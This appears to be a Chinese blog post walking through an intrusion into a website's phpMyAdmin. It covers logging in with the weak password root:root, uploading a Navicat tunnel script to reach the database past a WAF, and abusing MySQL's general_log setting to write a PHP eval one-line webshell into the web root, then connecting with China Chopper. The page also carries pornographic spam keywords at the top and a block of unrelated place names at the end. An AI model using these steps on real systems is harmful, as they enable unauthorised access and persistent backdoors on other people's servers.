亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Phpmyadmin滲透測試的示例

發布時間:2021-03-12 13:40:25 來源:億速云 閱讀:295 作者:小新 欄目:數據庫

這篇文章給大家分享的是有關Phpmyadmin滲透測試的示例的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

首先通過目錄掃描對某站進行掃描,發現存在phpmyadmin,嘗試弱口令root:root很幸運進去了

Phpmyadmin滲透測試的示例

嘗試使用Navicate進行數據庫連接返回禁止遠程連接數據庫:

Phpmyadmin滲透測試的示例

但是遠程命令執行發現本地3306端口時開放的,于是嘗試通過代理進行連接:

Phpmyadmin滲透測試的示例

Navicat安裝目錄下上傳ntunnel_mysql.php文件(數據庫的代理腳本)到目標服務器任意web站點目錄(后面getshell后上傳的)

Phpmyadmin滲透測試的示例

上傳到D:/phpStudy/WWW目錄進行訪問http://XXX/ntunnel_mysql.php 測試成功

Phpmyadmin滲透測試的示例

進行測試連接:

(此時,在本地打開Navicat配置http連接,這里的通道地址就寫你上面訪問的那個url,說白點兒就是個代理端,勾上使用base64編碼,防止waf從中作祟,然后主機名寫localhost,賬號密碼寫lnmp01本地數據庫用戶的賬號即可,因為要連接lnmp01本地的mysql)

Phpmyadmin滲透測試的示例

利用日志文件

mysql 5.0版本以上會創建日志文件,修改日志的全局變量,也可以getshell。但是也要對生成的日志有可讀可寫的權限。

set global general_log = "ON";   #當開啟general時,所執行的sql語句都會出現在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所執行的sql語句就會對應生成進而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #對應就會生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #將一句話木馬寫入test1234.php文件

菜刀連接:

Phpmyadmin滲透測試的示例

感謝各位的閱讀!關于“Phpmyadmin滲透測試的示例”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

古交市| 永春县| 阳泉市| 勃利县| 胶州市| 桦甸市| 孟村| 惠来县| 东阳市| 法库县| 汕头市| 同江市| 成都市| 九台市| 泌阳县| 禄劝| 曲周县| 长岛县| 虹口区| 彭州市| 永新县| 新丰县| 上蔡县| 大邑县| 潼南县| 邛崃市| 临安市| 额尔古纳市| 淮南市| 湖口县| 靖江市| 灵台县| 绥宁县| 新巴尔虎左旗| 孝感市| 全南县| 宽甸| 屏南县| 比如县| 根河市| 资源县|